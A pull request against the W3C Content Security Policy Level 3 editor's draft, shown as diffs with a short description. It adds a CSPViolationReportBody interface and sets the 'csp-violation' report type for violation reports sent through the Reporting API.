   <link href="https://www.w3.org/TR/CSP3/" rel="canonical">
-  <meta content="e96149d9062053cc692a65717ef67b2f3aeead86" name="document-revision">
+  <meta content="add708212f39857f9c9e69e045abbb09af454e6b" name="document-revision">
 <style>
   ul.toc ul ul ul {
     margin: 0 0 0 2em;
@@ -1458,7 +1458,7 @@ pre.highlight, pre > code.highlight { display: block; padding: 1em; margin: .5em
   <div class="head">
    <p data-fill-with="logo"><a class="logo" href="https://www.w3.org/"> <img alt="W3C" height="48" src="https://www.w3.org/StyleSheets/TR/2016/logos/W3C" width="72"> </a> </p>
    <h1>Content Security Policy Level 3</h1>
-   <h2 class="no-num no-toc no-ref heading settled" id="subtitle"><span class="content">Editor’s Draft, <time class="dt-updated" datetime="2019-02-21">21 February 2019</time></span></h2>
+   <h2 class="no-num no-toc no-ref heading settled" id="subtitle"><span class="content">Editor’s Draft, <time class="dt-updated" datetime="2019-02-28">28 February 2019</time></span></h2>
    <div data-fill-with="spec-metadata">
     <dl>
      <dt>This version:
@@ -2872,8 +2872,8 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p>When one or more of a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑨">policy</a>’s directives is violated,
   a <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="csp-violation-report">csp violation report</dfn> may be generated and sent out to a
   reporting endpoint associated with the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⓪">policy</a>.</p>
-    <p><a data-link-type="dfn" href="#csp-violation-report" id="ref-for-csp-violation-report">csp violation report</a> have the <a data-link-type="dfn" href="https://w3c.github.io/reporting/#report-type" id="ref-for-report-type">report type</a> "feature-policy-violation".</p>
-    <p><a data-link-type="dfn" href="#csp-violation-report" id="ref-for-csp-violation-report①">csp violation report</a> are <a data-link-type="dfn" href="https://w3c.github.io/reporting/#visible-to-reportingobservers" id="ref-for-visible-to-reportingobservers">visible to <code>ReportingObserver</code>s</a>. </p>
+    <p><a data-link-type="dfn" href="#csp-violation-report" id="ref-for-csp-violation-report">csp violation reports</a> have the <a data-link-type="dfn" href="https://w3c.github.io/reporting/#report-type" id="ref-for-report-type">report type</a> "csp-violation".</p>
+    <p><a data-link-type="dfn" href="#csp-violation-report" id="ref-for-csp-violation-report①">csp violation reports</a> are <a data-link-type="dfn" href="https://w3c.github.io/reporting/#visible-to-reportingobservers" id="ref-for-visible-to-reportingobservers">visible to <code>ReportingObserver</code>s</a>. </p>
 <pre class="idl highlight def"><span class="kt">interface</span> <dfn class="nv dfn-paneled idl-code" data-dfn-type="interface" data-export="" id="cspviolationreportbody"><code>CSPViolationReportBody</code></dfn> : <a class="n" data-link-type="idl-name" href="https://w3c.github.io/reporting/#reportbody" id="ref-for-reportbody">ReportBody</a> {
   <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString"><span class="kt">USVString</span></a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString" id="dom-cspviolationreportbody-documenturl"><code>documentURL</code></dfn>;
   <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①"><span class="kt">USVString</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString?" id="dom-cspviolationreportbody-referrer"><code>referrer</code></dfn>;

--- a/index.src.html
+++ b/index.src.html
@@ -1555,10 +1555,10 @@ spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
   a <dfn export>csp violation report</dfn> may be generated and sent out to a
   reporting endpoint associated with the <a for="/">policy</a>.
 
-  <p><a>csp violation report</a> have the <a>report type</a>
-  "feature-policy-violation".</p>
+  <p><a>csp violation reports</a> have the <a>report type</a>
+  "csp-violation".</p>
 
-  <p><a>csp violation report</a> are <a>visible to
+  <p><a>csp violation reports</a> are <a>visible to
   <code>ReportingObserver</code>s</a>.
 
   <pre class="idl">
@@ -1872,6 +1872,7 @@ spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
                   
               :   {{CSPViolationReportBody/effectiveDirective}}
               ::  |violation|'s <a for="violation">effective directive</a>.
+                  
               :   {{CSPViolationReportBody/originalPolicy}}
               ::  The <a lt="serialized CSP">serialization</a> of |violation|'s
                   <a for="violation">policy</a>.
@@ -1882,16 +1883,21 @@ spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
                   `exclude fragment` flag set, if |violation|'s
                   <a for="violation">source file</a> is not null, or null
                   otherwise.
+
               :   {{CSPViolationReportBody/sample}}
               ::  |violation|'s <a for="violation">sample</a>.
+
               :   {{CSPViolationReportBody/disposition}}
               ::  |violation|'s <a for="violation">disposition</a>.
+
               :   {{CSPViolationReportBody/statusCode}}
               ::  |violation|'s <a for="violation">status</a>.
+
               :   {{CSPViolationReportBody/lineNumber}}
               ::  |violation|'s <a for="violation">line number</a>, if
                   |violation|'s <a for="violation">source file</a> is not null,
                   or null otherwise.
+
               :   {{CSPViolationReportBody/columnNumber}}
               ::  |violation|'s <a for="violation">column number</a>, if
                   |violation|'s <a for="violation">source file</a> is not null,

--- a/index.src.html
+++ b/index.src.html
@@ -129,6 +129,8 @@ spec: REPORTING; urlPrefix: https://w3c.github.io/reporting/
   type: dfn
     text: group
     text: queue report; url: queue-report
+    text: report type
+    text: visible to reportingobservers
 
 spec: SHA2; urlPrefix: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf
   type: dfn
@@ -1549,9 +1551,31 @@ spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
     Reporting
   </h2>
 
-  When one or more of a <a for="/">policy</a>'s directives is violated, a <dfn export>violation
-  report</dfn> may be generated and sent out to a reporting endpoint associated
-  with the <a for="/">policy</a>.
+  When one or more of a <a for="/">policy</a>'s directives is violated,
+  a <dfn export>csp violation report</dfn> may be generated and sent out to a
+  reporting endpoint associated with the <a for="/">policy</a>.
+
+  <p><a>csp violation report</a> have the <a>report type</a>
+  "feature-policy-violation".</p>
+
+  <p><a>csp violation report</a> are <a>visible to
+  <code>ReportingObserver</code>s</a>.
+
+  <pre class="idl">
+    interface CSPViolationReportBody : ReportBody {
+      readonly attribute USVString documentURL;
+      readonly attribute USVString? referrer;
+      readonly attribute USVString? blockedURL;
+      readonly attribute DOMString effectiveDirective;
+      readonly attribute DOMString originalPolicy;
+      readonly attribute USVString? sourceFile;
+      readonly attribute DOMString? sample;
+      readonly attribute SecurityPolicyViolationEventDisposition disposition;
+      readonly attribute unsigned short statusCode;
+      readonly attribute unsigned long? lineNumber;
+      readonly attribute unsigned long? columnNumber;
+    };
+  </pre>
 
   <h3 id="violation-events">
     Violation DOM Events
@@ -1831,7 +1855,47 @@ spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
           set</a> contains a <a>directive</a> named "<a>`report-to`</a>"
           (|directive|):
 
-          1.  Let |group| be |directive|'s <a for="directive">value</a>.
+          1.  Let |body| be a new {{CSPViolationReportBody}}, initialized as
+              follows:
+
+              :   {{CSPViolationReportBody/documentURL}}
+              ::  The result of executing the <a>URL serializer</a> on |violation|'s
+                  <a for="violation">url</a>, with the `exclude fragment` flag set.
+                  
+              :   {{CSPViolationReportBody/referrer}}
+              ::  The result of executing the <a>URL serializer</a> on |violation|'s
+                  <a for="violation">referrer</a>, with the `exclude fragment` flag set.
+                  
+              :   {{CSPViolationReportBody/blockedURL}}
+              ::  The result of executing the <a>URL serializer</a> on |violation|'s
+                  <a for="violation">resource</a>, with the `exclude fragment` flag set.
+                  
+              :   {{CSPViolationReportBody/effectiveDirective}}
+              ::  |violation|'s <a for="violation">effective directive</a>.
+              :   {{CSPViolationReportBody/originalPolicy}}
+              ::  The <a lt="serialized CSP">serialization</a> of |violation|'s
+                  <a for="violation">policy</a>.
+                  
+              :   {{CSPViolationReportBody/sourceFile}}
+              ::  The result of executing the <a>URL serializer</a> on
+                  |violation|'s <a for="violation">source file</a>, with the
+                  `exclude fragment` flag set, if |violation|'s
+                  <a for="violation">source file</a> is not null, or null
+                  otherwise.
+              :   {{CSPViolationReportBody/sample}}
+              ::  |violation|'s <a for="violation">sample</a>.
+              :   {{CSPViolationReportBody/disposition}}
+              ::  |violation|'s <a for="violation">disposition</a>.
+              :   {{CSPViolationReportBody/statusCode}}
+              ::  |violation|'s <a for="violation">status</a>.
+              :   {{CSPViolationReportBody/lineNumber}}
+              ::  |violation|'s <a for="violation">line number</a>, if
+                  |violation|'s <a for="violation">source file</a> is not null,
+                  or null otherwise.
+              :   {{CSPViolationReportBody/columnNumber}}
+              ::  |violation|'s <a for="violation">column number</a>, if
+                  |violation|'s <a for="violation">source file</a> is not null,
+                  or null otherwise.
 
           2.  Let |settings object| be |violation|'s <a for="violation">global
               object</a>'s <a>relevant settings object</a>.
@@ -1841,11 +1905,11 @@ spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
               following arguments:
 
               :   |data|
-              ::  |violation|
+              ::  |body|
               :   |type|
-              ::  "CSP"
+              ::  "csp-violation"
               :   |endpoint group|
-              ::  |group|
+              ::  |directive|'s <a for="directive">value</a>.
               :   |settings|
               ::  |settings object|
 </section>


### PR DESCRIPTION
I noticed that although this spec states that CSP violation reports are sent to the Reporting API (to be delivered both to a reporting endpoint and any ReportingObservers), the form of the body of the report is never specified. This change specifies exactly that.


<!--
    This comment and the below content is programatically generated.
    You may add a comma-separated list of anchors you'd like a
    direct link to below (e.g. #idl-serializers, #idl-sequence):

    Don't remove this comment or modify anything below this line.
    If you don't want a preview generated for this pull request,
    just replace the whole of this comment's content by "no preview"
    and remove what's below.
-->
***
<a href="https://pr-preview.s3.amazonaws.com/paulmeyer90/webappsec-csp/pull/385.html" title="Last updated on Feb 28, 2019, 2:51 PM UTC (e12eea5)">Preview</a> | <a href="https://pr-preview.s3.amazonaws.com/w3c/webappsec-csp/385/e96149d...paulmeyer90:e12eea5.html" title="Last updated on Feb 28, 2019, 2:51 PM UTC (e12eea5)">Diff</a>